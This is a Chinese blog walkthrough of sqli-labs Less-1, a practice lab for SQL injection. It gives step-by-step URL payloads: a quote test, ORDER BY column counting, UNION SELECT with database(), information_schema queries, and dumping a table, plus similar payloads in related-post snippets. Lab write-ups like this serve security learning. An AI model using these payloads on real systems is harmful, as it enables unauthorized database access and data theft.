sql-lab题解

最新推荐文章于 2024-05-02 22:32:03 发布
最新推荐文章于 2024-05-02 22:32:03 发布
阅读量404 收藏 1
点赞数 1
分类专栏: web 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64584221/article/details/124026001
版权

zhiLess-1–基于单引号的字符型注入

初始界面:

 上面提示:

Please input the ID as parameter with numeric value

意思是我们应该输入一个ID信息

我们给他一个id的传参 ?id=1

在id的之后面加 ’ 可判断 是否有漏洞

可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被数据库解析,那么我们就可以通过闭合这个id这个参数,然后插入自己构造的sql语句实施攻击。

然后找字段数 

确定字段数一般可以使用order by 语句

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 1-- qwe

执行成功;

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 2 -- qwe

执行成功; 

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 3 -- qwe

执行成功; 

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 4 -- qwe

报错。

意思就是没有第四个字段,也就可以推断原本的sql语句只是有用到了三个字段。

注意:

–+:结束符

–:注释符

#:注释符

因为sql语句的执行结果只有第一行会被回显在页面上,所以我们要把原始语句的的结果集变为空,这样我们想要的结果才能显示在界面上,现在我们又需要确定哪几个字段会被显示在页面上:

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,2,3 -- qwe

可以看到字段2,3被显示在了页面上。

接着可以获取数据库的库名

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,database(),3 -- qwe

 可以看出数据库名字为'security'

再接着获取表名

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,table_name,3 from information_schema.tables where table_schema='security' -- qwe

然后获取列名 

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails' -- qwe

 最后就可以判断字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,id,3 from emails -- qwe

不熬夜的羊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
js-leetcode题解之种花问题-题解.zip
05-09
这个名为“js-leetcode题解之种花问题-题解.zip”的压缩包文件,显然是针对LeetCode中的一道具体题目——“种花问题”提供了JavaScript的解决方案。下面,我们将详细探讨这道题目及其解题策略。 “种花问题”通常是...
js-leetcode题解之最长公共前缀-题解.zip
最新发布
05-09
题解集中关注的是“最长公共前缀”问题,这是一个典型的字符串处理问题,在面试和实际项目中都有可能出现。现在,我们将深入探讨这个问题,以及如何用JavaScript来解决它。 首先,我们要理解什么是“最长公共前缀...
sql-labs通关详解(1-10)
guowu666的博客
05-02 582
sqli-labs 1-10通关详解。
Sqli-labs 1-65关的解题记录(做题思路与简要)
CaesarQu的博客
08-13 3563
Sqli-labs的详细解题记录 Less-1: 进入关卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
SQLi-LABS Page-1(Basic Challenges) 解题
qq_51919093的博客
06-11 1035
关于Sqli-labs靶场的搭建,这篇文章只做解题。
sql-labs 前16关 非常详细
ChenD的学习笔记
10-07 364
sql-lab靶场前16题
sqli-labs————Less-55
Fly_鹏程万里
05-22 442
Less -55源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&g..
SQL注入靶场sqli-labs(1-6)
m0_49025459的博客
05-09 774
Less-1(基于错误的GET单引号字符型注入) 我们直接看看源码弄明白什么是单引号字符型注入 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id']))//判断GET获取的id不能为空 { $id=$_GET['id'];//让id=我
js-leetcode题解之字符串字符最短路径-题解.zip
05-09
题解聚焦于“字符串字符最短路径”这道LeetCode题目,通过JavaScript来求解。这道问题涉及到字符串处理、动态规划以及可能的回溯策略等核心知识点。 一、字符串处理 在JavaScript中,处理字符串是常见的操作。...
java面试-leetcode面试题解之最大数-java题解.zip
03-09
题解主要关注的是在LeetCode中的一类问题——如何找出一组数字中的最大数。这类问题在实际编程中有着广泛的应用,比如在排序算法、数据分析等领域。 首先,我们需要了解最大数问题的基本概念。在给定一个整数数组...
ccf-201312-1题解
04-17
ccf-201312-1题解
sqli-lab详解——做题笔记11-20
Dream__Catcher的博客
10-12 1052
这部分的题目都是通过POST方法注入 less-11 基于报错-单引号字符串 在user或者password栏中输入 1’ or 1=1 # 获取信息: 1’ or 1=1 LIMIT 2,1 #2可换成需要的数字 还可以用盲注的方法获得信息(后面补充) less-12 基于报错-双引号字符串变式 在user或者password栏中输入 2&amp;amp;quot;) or 1=1 # less-13 双注入-单引号字符...
sqli-labs提示和答案(含详细教程)
superprintf的博客
10-02 1637
前四关登录成功显示用户名,报错正常 第一关id=‘1’ 第二关id=1 第三关id=(‘1’) 第四关id=(“1”) 第五关和六关登录成功不显示用户名,报错正常 第五关id=‘1’ 第六关id=“1” 第七关登录成功不显示用户名,报错固定为You have an error in your SQL syntax 第七关id=((‘1’)) 第八关登录成功不显示用户名,不报错 第八关id=‘1’ 第九关登录成功或者失败只显示You are in… ...
Sqli-labs第一题详解
未完成的歌~的博客
06-10 1962
less1: 根据题目提示为单引号注入,先测试一下 果然报错了,说明我们添加的单引号被数据库成功解析,那我们就可以通过闭合id这个参数 ,然后构造自己的sql语句进行攻击。一般可以使用联合表的方式来提取自己感兴趣的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。 ...
sqli-labs解题大法21~28a
weixin_43733035的博客
01-23 596
Less-21: 第21关,根据前面18关之后的经验,我决定先登录一下试试,然后… 瞬间爆炸了有木有,一堆英文完全看不懂啥意思,不过幸好有百度翻译, emmmm,好像没什么用,该没看懂还是没看懂,不过看到有user-agent和http,就决定先用' and union select 1,2,3#试一下,发现语句会直接输出,并没有注入。 然而,当我在cookie之中写payload时页面出现了...
SQL-lab 1-4关
yueshangttt的博客
04-09 3737
SQL注入原理 语言分类 1.解释型语言 2.编译型语言 解释型语言,若程序与用户进行交互时。用户就可以构造特殊的输入来拼接到程序中执行,从而使得程序依据用户输入执行有可能存在恶意行为的代码。 万能密码(绕过用户名和密码) 用户名:admin'or1=1-- (单行注释后必须有空格) 密码:随意就可以 cms逻辑:index.php首页展示内容,具有文章列表(l链接具有文章id ),articles.php文章详细页,URL中article.php?id=文章id读取文章id ...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
Sqli-labs通关总结
→_→
06-27 1969
历经两个多月,总于通关了,后面还有10关由于原作者并没有没有更新,我们也就无从下手,不过从这65关中我们足以对SQL注入有了一个清晰的了解了,也就勉强达到SQL注入入门的水平,接下来就是去各大平台去找SQL类型的题目去做。 在通关的过程中参考了别人写的博客,因为是初学者,参考了大量的博客,参考的过程中即能提升自己的技能,也能学习别人的思路,还能总结他们的做法,通关的方法有很多,我都一一做了记录,当然还要说一点的是,别人的博客多多少少都会有点错误,这需要我们自己去发现,记住,一定要自己...
前端练习题 代码敲烂月薪过万.docx
07-01
前端练习题 代码敲烂月薪过万

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值